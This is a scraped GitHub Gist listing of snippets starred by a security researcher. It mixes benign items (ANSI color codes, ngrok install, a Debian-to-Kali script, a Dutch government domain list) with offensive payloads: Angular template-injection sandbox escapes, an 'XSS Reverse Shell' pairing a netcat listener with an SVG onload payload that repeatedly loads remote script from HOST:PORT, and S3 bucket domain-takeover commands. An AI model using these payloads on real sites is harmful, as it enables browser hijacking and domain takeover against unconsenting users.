Skip to content

Instantly share code, notes, and snippets.

View PushkraJ99's full-sized avatar
:shipit:
Security Researcher

PushkraJ PushkraJ99

:shipit:
Security Researcher
39 followers · 128 following
View GitHub Profile
@mccabe615
mccabe615 / AngularTI.md
Last active April 18, 2024 11:37
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@MrSuicideParrot
MrSuicideParrot / Wifi-restart.sh
Last active August 17, 2024 10:04
Restart network on kali linux, after use wirless in monitor mode
#!/bin/bash
sudo service networking restart
sudo service NetworkManager restart
@natesubra
natesubra / oscp_links.md
Last active September 22, 2024 14:53
Useful OSCP Links
@ivanvza
ivanvza / xss_shell.txt
Created February 28, 2017 20:36
XSS Reverse Shell
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
@MrMugiwara
MrMugiwara / NetSecCheck.md
Created June 22, 2017 23:08
Network Security VAPT Checklist

Hi dear reader, there are very few technical network security assessment checklist. So I thought to share my own on this. Have a look and enjoy. Lets talk about the scope first. If you are given a 1000 machines to perform VAPT, then here is your scope. Single machine can have 65535 ports open. Any single port can deploy any service software from the world. For example FTP can be run on smartftp, pureftpd etc.. Any single FTP software version (for example pureftpd 1.0.22) can have number of vulnerabilities available. So if you multiply all of these, then it is impossible for any auditor to go ahead and probe all ports manually and find services manually. Even if he/she is able to do it, it is impossible to check all vulnerabilities that are pertaining to a single port of a single machine. Hence we have to rely on scanners such as nexpose, nessus, openvas, coreimpact etc. Here are some quick tools and test cases that one can perform on commonly found ports in the network pentest.

Identify live host

@JBlond
JBlond / bash-colors.md
Last active November 17, 2024 07:06 — forked from iamnewton/bash-colors.md
The entire table of ANSI color codes.

Regular Colors

Value Color
\e[0;30m Black
\e[0;31m Red
\e[0;32m Green
\e[0;33m Yellow
\e[0;34m Blue
\e[0;35m Purple
@hrbrmstr
hrbrmstr / s3-domain-takeover.sh
Created May 19, 2018 11:34
https://publicwww.com/websites/NoSuchBucket/
aws s3 mb s3://BUCKET_NAME
aws s3 cp SOMEFILE s3://BUCKET_NAME SOMEFILE
{
"Version":"2018-01-01",
"Statement":[{"Sid":"AddPerm","Effect":"Allow","Principal": "*",
"Action":["s3:GetObject"],
"Resource":["arn:aws:s3:::BUCKET_NAME/*"] }]
@SalahHamza
SalahHamza / install_ngrok.md
Last active November 7, 2024 15:35
How to install ngrok on linux subsystem for windows
@Zawadidone
Zawadidone / Dutch-Government-Domains
Last active October 20, 2024 18:32
The Dutch Government web register (https://www.ncsc.nl/english/security, https://www.communicatierijk.nl/vakkennis/r/rijkswebsites/verplichte-richtlijnen/websiteregister-rijksoverheid)
knmi.nl
rijksoverheid.nl
overheid.nl
duo.nl
politie.nl
koninklijkhuis.nl
defensie.nl
kadaster.nl
werkenbijdefensie.nl
cbs.nl
@warecrash
warecrash / makekali.sh
Last active August 29, 2024 18:37
Convert Debian to Kali
apt update
apt -y install wget gnupg dirmngr
wget -q -O - https://archive.kali.org/archive-key.asc | gpg --import
gpg --keyserver hkp://keys.gnupg.net --recv-key 44C6513A8E4FB3D30875F758ED444FF07D8D0BF6
echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
gpg -a --export ED444FF07D8D0BF6 | sudo apt-key add -
apt update
apt -y upgrade
apt -y dist-upgrade
apt -y autoremove --purge